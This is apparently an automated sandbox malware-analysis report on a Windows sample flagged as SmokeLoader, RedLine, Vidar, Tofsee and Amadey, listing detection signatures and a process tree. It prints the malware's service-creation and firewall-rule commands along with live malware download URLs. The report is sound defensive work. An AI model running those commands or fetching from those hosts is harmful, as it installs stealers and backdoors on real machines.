Play interactive tour

Edit tour

Windows Analysis Report emPJndhuvA.exe

Overview

General Information

Sample Name:	emPJndhuvA.exe
Analysis ID:	552870
MD5:	a7444553f8a8fe2702b6fd48008d6605
SHA1:	f6d3d6ccf728ae7ab39b7e29f21ae5bcc7fce98b
SHA256:	ba5303301925a877689b30efc36f872564f06906b2a61d7c3a7c955b0587d4f8
Tags:	exeRedLineStealer
Infos:
Most interesting Screenshot:

Detection

Amadey RedLine SmokeLoader Tofsee Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Detected unpacking (overwrites its own PE header)

Yara detected SmokeLoader

Yara detected Amadey bot

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Sigma detected: Suspect Svchost Activity

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Yara detected Vidar stealer

Multi AV Scanner detection for dropped file

Yara detected Tofsee

Sigma detected: Copying Sensitive Files with Credential Data

Maps a DLL or memory area into another process

Found evasive API chain (may stop execution after checking mutex)

Uses netsh to modify the Windows network and firewall settings

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Allocates memory in foreign processes

Creates files in the system32 config directory

Injects a PE file into a foreign processes

Sigma detected: Suspicious Svchost Process

Found evasive API chain (may stop execution after checking locale)

Contains functionality to inject code into remote processes

Deletes itself after installation

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Drops executables to the windows directory (C:\Windows) and starts them

Checks if the current machine is a virtual machine (disk enumeration)

Writes to foreign memory regions

.NET source code references suspicious native API functions

Changes security center settings (notifications, updates, antivirus, firewall)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

.NET source code contains method to dynamically call methods (often used by packers)

PE file has nameless sections

Machine Learning detection for dropped file

Modifies the windows firewall

Contains functionality to detect sleep reduction / modifications

Found evasive API chain (may stop execution after checking computer name)

Found decision node followed by non-executed suspicious APIs

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Sigma detected: Netsh Port or Application Allowed

Found large amount of non-executed APIs

May check if the current machine is a sandbox (GetTickCount - Sleep)

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

Creates files inside the system directory

PE file contains sections with non-standard names

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Uses SMTP (mail sending)

Found evaded block containing many API calls

Found evasive API chain (may stop execution after accessing registry keys)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

emPJndhuvA.exe (PID: 3352 cmdline: "C:\Users\user\Desktop\emPJndhuvA.exe" MD5: A7444553F8A8FE2702B6FD48008D6605)

emPJndhuvA.exe (PID: 4160 cmdline: "C:\Users\user\Desktop\emPJndhuvA.exe" MD5: A7444553F8A8FE2702B6FD48008D6605)

explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

2819.exe (PID: 3104 cmdline: C:\Users\user\AppData\Local\Temp\2819.exe MD5: 277680BD3182EB0940BC356FF4712BEF)

WerFault.exe (PID: 5956 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 540 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

3D67.exe (PID: 5276 cmdline: C:\Users\user\AppData\Local\Temp\3D67.exe MD5: BB0BA8D31F37E6B9F683EBD9044F1A85)

3D67.exe (PID: 4968 cmdline: C:\Users\user\AppData\Local\Temp\3D67.exe MD5: BB0BA8D31F37E6B9F683EBD9044F1A85)

FD2B.exe (PID: 468 cmdline: C:\Users\user\AppData\Local\Temp\FD2B.exe MD5: CEBAF005081C730D4AC7A87E46B440D0)

952.exe (PID: 1068 cmdline: C:\Users\user\AppData\Local\Temp\952.exe MD5: 4C29CFD658E015FA4DB5A2454F103D4A)

cmd.exe (PID: 4356 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bhlprady\ MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6248 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\vodibdaj.exe" C:\Windows\SysWOW64\bhlprady\ MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 6304 cmdline: C:\Windows\System32\sc.exe" create bhlprady binPath= "C:\Windows\SysWOW64\bhlprady\vodibdaj.exe /d\"C:\Users\user\AppData\Local\Temp\952.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)

conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 6372 cmdline: C:\Windows\System32\sc.exe" description bhlprady "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)

conhost.exe (PID: 6384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 6412 cmdline: "C:\Windows\System32\sc.exe" start bhlprady MD5: 24A3E2603E63BCB9695A2935D3B24695)

conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

netsh.exe (PID: 6460 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

13E2.exe (PID: 2316 cmdline: C:\Users\user\AppData\Local\Temp\13E2.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)

13E2.exe (PID: 6652 cmdline: C:\Users\user\AppData\Local\Temp\13E2.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)

svchost.exe (PID: 4372 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4596 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4400 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5784 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5400 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5056 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 2872 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 5796 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3540 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 6628 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 1280 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

tiftjuh (PID: 4892 cmdline: C:\Users\user\AppData\Roaming\tiftjuh MD5: A7444553F8A8FE2702B6FD48008D6605)

tiftjuh (PID: 5816 cmdline: C:\Users\user\AppData\Roaming\tiftjuh MD5: A7444553F8A8FE2702B6FD48008D6605)

svchost.exe (PID: 5208 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

WerFault.exe (PID: 5736 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3104 -ip 3104 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

vodibdaj.exe (PID: 6484 cmdline: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe /d"C:\Users\user\AppData\Local\Temp\952.exe" MD5: E331BE085840751FF0AC8DCBCDC5F5E3)

svchost.exe (PID: 6580 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.310069625.0000000001F51000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001C.00000002.386280466.0000000001F30000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000020.00000002.447751764.0000000004021000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001C.00000002.386498287.0000000002431000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001E.00000002.412229320.0000000000580000.00000040.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0000001D.00000002.379514532.0000000000482000.00000004.00000020.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000002.379514532.0000000000482000.00000004.00000020.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000000.295057363.0000000003A61000.00000020.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000015.00000002.360645909.00000000004D1000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001E.00000003.383697292.00000000005A0000.00000004.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000031.00000000.439581609.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.309813053.0000000000530000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000002C.00000002.417710033.0000000000540000.00000040.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0000002C.00000002.417504443.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0000002E.00000002.543176167.00000000001E0000.00000040.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0000001E.00000002.410807233.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0000002C.00000002.417841182.0000000000610000.00000004.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000015.00000002.360518485.00000000004A0000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000031.00000000.440529688.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000031.00000000.438204104.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000002C.00000003.415295647.0000000000560000.00000004.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000031.00000000.438919609.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 952.exe PID: 1068	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
Process Memory Space: vodibdaj.exe PID: 6484	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author
1.1.emPJndhuvA.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
21.0.tiftjuh.400000.4.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
21.0.tiftjuh.400000.6.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
21.2.tiftjuh.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
32.2.13E2.exe.413f910.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
28.1.3D67.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
44.3.vodibdaj.exe.560000.0.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
30.3.952.exe.5a0000.0.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
20.2.tiftjuh.4615a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
44.2.vodibdaj.exe.610000.2.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
30.2.952.exe.400000.0.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
30.2.952.exe.580e50.1.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
1.2.emPJndhuvA.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
32.2.13E2.exe.413f910.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
21.1.tiftjuh.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
44.2.vodibdaj.exe.540e50.1.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0.2.emPJndhuvA.exe.5315a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
44.2.vodibdaj.exe.610000.2.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
28.2.3D67.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
30.2.952.exe.400000.0.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
21.0.tiftjuh.400000.5.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
44.2.vodibdaj.exe.400000.0.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
25.2.3D67.exe.4615a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
44.2.vodibdaj.exe.400000.0.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
Click to see the 19 entries

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity

Show sources

Source: Process started

Author: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe /d"C:\Users\user\AppData\Local\Temp\952.exe", ParentImage: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe, ParentProcessId: 6484, ProcessCommandLine: svchost.exe, ProcessId: 6580

Sigma detected: Copying Sensitive Files with Credential Data

Show sources

Source: Process started

Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\vodibdaj.exe" C:\Windows\SysWOW64\bhlprady\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\vodibdaj.exe" C:\Windows\SysWOW64\bhlprady\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\952.exe, ParentImage: C:\Users\user\AppData\Local\Temp\952.exe, ParentProcessId: 1068, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\vodibdaj.exe" C:\Windows\SysWOW64\bhlprady\, ProcessId: 6248

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe /d"C:\Users\user\AppData\Local\Temp\952.exe", ParentImage: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe, ParentProcessId: 6484, ProcessCommandLine: svchost.exe, ProcessId: 6580

Sigma detected: Netsh Port or Application Allowed

Show sources

Source: Process started

Author: Markus Neis, Sander Wiebing: Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\952.exe, ParentImage: C:\Users\user\AppData\Local\Temp\952.exe, ParentProcessId: 1068, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 6460

Sigma detected: New Service Creation

Show sources

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\System32\sc.exe" create bhlprady binPath= "C:\Windows\SysWOW64\bhlprady\vodibdaj.exe /d\"C:\Users\user\AppData\Local\Temp\952.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create bhlprady binPath= "C:\Windows\SysWOW64\bhlprady\vodibdaj.exe /d\"C:\Users\user\AppData\Local\Temp\952.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\952.exe, ParentImage: C:\Users\user\AppData\Local\Temp\952.exe, ParentProcessId: 1068, ProcessCommandLine: C:\Windows\System32\sc.exe" create bhlprady binPath= "C:\Windows\SysWOW64\bhlprady\vodibdaj.exe /d\"C:\Users\user\AppData\Local\Temp\952.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 6304

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://185.7.214.171:8080/6.php	URL Reputation: Label: malware
Source: http://data-host-coin-8.com/files/4918_1642080252_3360.exe	Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exe	Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/8474_1641976243_3082.exe	Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/9006_1642091568_3496.exe	Avira URL Cloud: Label: malware
Source: http://unicupload.top/install5.exe	URL Reputation: Label: phishing
Source: http://privacy-tools-for-you-780.com/downloads/toolspab3.exe	Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\13E2.exe

Avira: detection malicious, Label: HEUR/AGEN.1211353

Multi AV Scanner detection for submitted file

Show sources

Source: emPJndhuvA.exe	Virustotal: Detection: 40%			Perma Link
Source: emPJndhuvA.exe	ReversingLabs: Detection: 65%

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Metadefender: Detection: 45%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Metadefender: Detection: 45%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\2819.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\5F8C.exe	Metadefender: Detection: 29%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\5F8C.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\tiftjuh	ReversingLabs: Detection: 65%

Machine Learning detection for sample

Show sources

Source: emPJndhuvA.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\7E61.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\952.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6B74.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\tiftjuh	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5F8C.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\45F8.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vodibdaj.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B1F6.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9054.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CA61.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Joe Sandbox ML: detected

Source: 30.3.952.exe.5a0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 44.2.vodibdaj.exe.610000.2.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 30.2.952.exe.580e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 29.3.FD2B.exe.5a0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 44.2.vodibdaj.exe.540e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 29.2.FD2B.exe.580e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 44.3.vodibdaj.exe.560000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 30.2.952.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 44.2.vodibdaj.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00407190 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_005876C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00584A80 CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00587760 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_005879F0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_005873E0 CryptUnprotectData,

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Unpacked PE file: 29.2.FD2B.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\952.exe	Unpacked PE file: 30.2.952.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe	Unpacked PE file: 44.2.vodibdaj.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe	Unpacked PE file: 44.2.vodibdaj.exe.400000.0.unpack

Source: unknown

HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49846 version: TLS 1.0

Source: emPJndhuvA.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\2819.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.5:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49839 version: TLS 1.2

Source:	Binary string: profapi.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 2819.exe, 00000016.00000000.348562532.0000000000413000.00000002.00020000.sdmp, 2819.exe, 00000016.00000000.361993606.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.426093244.0000000005790000.00000002.00020000.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000001B.00000003.370138407.00000000035D5000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.370897133.00000000035D5000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.369939315.00000000035D5000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.369869588.0000000005387000.00000004.00000001.sdmp
Source:	Binary string: C:\tececa\sidexivuheje-vewa\xilo.pdb source: FD2B.exe, 0000001D.00000000.369230525.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
